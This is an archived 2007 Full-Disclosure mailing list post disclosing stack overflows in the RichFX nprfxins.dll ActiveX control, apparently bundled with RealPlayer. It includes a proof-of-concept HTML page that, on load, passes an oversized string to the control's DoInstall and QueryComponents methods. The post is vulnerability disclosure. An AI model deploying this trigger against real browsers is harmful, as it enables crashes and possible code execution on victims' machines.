lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sun, 25 Nov 2007 17:42:28 -0500 (GMT-05:00) From: Elazar Broad <elazarb@...thlink.net> To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk> Subject: RichFX nprfxins.dll ActiveX Control Multiple Stack Overflows There are multiple stack overflows in the RichFX nprfxins.dll ActiveX Control. I almost positive that this control was installed with RealNetworks RealPlayer. This was tested on Windows XP SP2 fully patched and IE6. This control is marked safe for scripting. I have not tested code execution. PoC as follows: ------------ <!-- written by e.b. --> <html> <head> <script language="JavaScript" DEFER> function Check() { var s = "AAAA"; while (s.length < 999999) s=s+s; var obj = new ActiveXObject("RFXInstMgr.RFXInstMgr"); //{47F59200-8783-11D2-8343-00A0C945A819} obj.DoInstall(s); obj.QueryComponents(s); } </script> </head> <body onload="JavaScript: return Check();"> </body> </html> ------------ Elazar _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists